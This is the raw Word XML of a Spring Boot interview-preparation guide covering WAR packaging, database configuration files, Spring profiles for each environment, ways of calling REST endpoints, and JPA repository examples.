    <w:p w14:paraId="7D386A9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785D71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33CBBB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29DA0E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D5E2B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maven-plugin&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF7B0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3710219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inClass&gt;com.example.YourMainClass&lt;/mainClass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4D0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65181A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68B3E1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57EDC8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583402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sures that Spring Boot runs your WAR as a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5FE91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pdate SpringBootApplication Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D6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r main application class (@SpringBootApplication annotated class) should extend SpringBootServletInitializer to support the WAR deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07089E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0ABDF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CB1F0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upport.SpringBootServletInitializer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156FA70" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D24E3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F1052C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extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704557BD" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F43E2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5A59DC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446A4CA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0BF465" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAB89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5D91A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application) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C77E9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application.sources(Application.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F5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EBDBA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6C814"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Build the WAR File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4647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ve updated the pom.xml file, run the following Maven command to build your WAR file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F22DE9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07C1C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generate a *.war file inside the target/ directory of your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19435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ploy the WAR to an External Servlet Container (like Tomcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739D6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WAR is built, you can deploy it to an external servlet container like </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D92C5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 Place the WAR file in the webapps/ directory of your Tomcat installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268723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ther Containers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For other containers, check their deployment instructions for WAR files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D752E"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Optional: Application Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165200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specific to WAR deployments in the application.properties or application.yml files. For example, configuring ports, context paths, etc., for the web container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B1C4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6C89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from a JAR to a WAR in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AEF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ge the packaging type in pom.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3665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lude embedded Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D8E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r main application class extends SpringBootServletInitializer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014643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the WAR file using Maven.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C7F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loy the WAR to an external web server like Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C155C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enable your Spring Boot application to be packaged as a WAR and deployed on a traditional servlet container like Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B5DE5" w14:textId="280E88C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618" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D3AAC" w14:textId="439DA2E6" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00864748">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="637" w:name="_Toc197867851"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will you give database details in the spring boot application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="637"/>
    </w:p>
    <w:p w14:paraId="7EB79E9B" w14:textId="2BC90681"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atabase details</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically configured in the application.properties or application.yml file, located in the src/main/resources directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654CA11C"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E7C4B4">
          <v:rect id="_x0000_i2619" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD924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properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347279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URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4A1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atabase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB19CC" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1109B0E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credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD469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ED6C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yourpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71728401" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513F16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DBC driver (optional if Spring Boot auto-detects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4CE57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2D0BB5BD" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3547CD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PA / Hibernate settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0D0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A6C7D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4F0AC85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8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3A244"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1FDF1">
          <v:rect id="_x0000_i2620" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564F88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yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FF7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CF1CD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5367C4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l: jdbc:mysql://localhost:3306/mydatabase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5D0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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189E8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yourpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029ED9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river-class-name: com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23025B53" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7653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pa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F1A6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B5438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dl-auto: update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B86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how-sql: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27EC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perties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A412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95D8A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ialect: org.hibernate.dialect.MySQL8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485FC46"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27C425">
          <v:rect id="_x0000_i2621" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BE4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 on Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2DD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hard-code sensitive credentials like database usernames and passwords in production. Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68B98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vironment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA20DC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Cloud Config Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7DC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crypted secrets management (Vault, AWS Secrets Manager, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2AD02" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="00CE4B95"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622" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="681784DD" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="638" w:name="_Toc197867852"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>As an end user how can I consume your services?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="638"/>
    </w:p>
    <w:p w14:paraId="69511316" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="002C6305" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">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s an </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end user</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can consume my Spring Boot services through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using the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6656160C"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FC761">
          <v:rect id="_x0000_i2623" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98A926"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 REST Client (like Postman or curl):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DC1A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make HTTP requests like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B6CB4"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request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825F60D"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employee/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D478F"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request (with JSON body):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F1617"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 http://localhost:8080/api/employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F1B5D"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ent-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9A2AA" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="002C6305" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61423277"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96EFD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Siddhant",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C31E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signation": "Java Developer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079304C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E2AC698"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09608">
          <v:rect id="_x0000_i2624" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A118492"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From a Frontend Application (Angular/React):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17963A"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http.get("http://localhost:8080/api/employee/1").subscribe(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB09F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sole.log(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9E281"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A35B49"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85074">
          <v:rect id="_x0000_i2625" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1D310"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Using Command-line tools (curl):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133AFAF6"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rl -X GET http://localhost:8080/api/employee/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BA6371"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337AE">
          <v:rect id="_x0000_i2626" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185C91C"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Mobile App Consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480EF99"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bile apps (Android/iOS) can hit REST endpoints over HTTPS to send or fetch data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61746B71"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BC7E8">
          <v:rect id="_x0000_i2627" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4AAF7D"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Browser (for GET endpoints):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B3C68"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ndpoint is GET and returns data like JSON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31892E22"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api/message?user=Siddhant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBABB6" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="002C6305" w:rsidRDefault="00000000" w:rsidP="009C08F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10E3DF">
          <v:rect id="_x0000_i2628" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B74B66" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="002C6305" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">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ptional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD43948"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may need to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pass Authorization headers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if JWT/OAuth2 is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA665F5"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I documentation tools like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and understand the API endpoints easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA249EF" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="002C6305" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">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Swagger setup or frontend integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB3F2D" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C08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02E4FC">
          <v:rect id="_x0000_i2629" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C399F19" w14:textId="1F4DDF6A" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="639" w:name="_Toc197867853"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you give database details for the individual environment</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="639"/>
    </w:p>
    <w:p w14:paraId="09AB6E9B" w14:textId="181AA5D6" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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provide </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database details per environment</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application, use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with separate application-{profile}.properties or application-{profile}.yml files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BED34E"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5AF9C4">
          <v:rect id="_x0000_i2630" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD0426"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by-step Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0554CAC0"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profile-specific config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F2C9E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1D390F9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pplication-dev.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118F2A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252274E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB48D0"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file contains DB config specific to that environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55225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43122D3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B5E05E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5116389A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C864E2D"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71F33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server:3306/prod_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C107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6D5FB73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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C056020"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CC9C3">
          <v:rect id="_x0000_i2631" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="454571AF"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t active profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14271A0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the profile in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1EFF2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 In application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F30196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34B0C6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 As a command-line argument:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128E8D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profiles.active=prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A981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 As an environment variable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29857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PRING_PROFILES_ACTIVE=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F221A3"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 In IDE (e.g., IntelliJ Run Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22014A46"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spring.profiles.active=test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B3407"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453DE4">
          <v:rect id="_x0000_i2632" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557A6CB"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efault application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA680B4"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yml) for common/shared settings across all environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A453C1" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="00CE4B9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633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="359FE103" w14:textId="14F62316" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="640" w:name="_Toc197867854"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a JPA repository</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="640"/>
    </w:p>
    <w:p w14:paraId="7A2D7147" w14:textId="752578EA" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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is a part of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hat provides a simplified way to implement data access layers using the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Persistence API (JPA)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5FAEB6"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an interface that extends PagingAndSortingRepository and CrudRepository, providing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE4C5E"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CRUD operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48847A3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ation and sorting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51F93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y methods (by method name or using @Query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3376E"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C21D3C">
          <v:rect id="_x0000_i2634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E025F7C"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yntax Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1600D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332C495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ByDepartment(String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4506A91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925F7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SELECT e FROM Employee e WHERE e.salary &gt; :minSalary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2965B00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HighEarners(@Param("minSalary") double minSalary);</w:t>
      </w:r>
    </w:p>
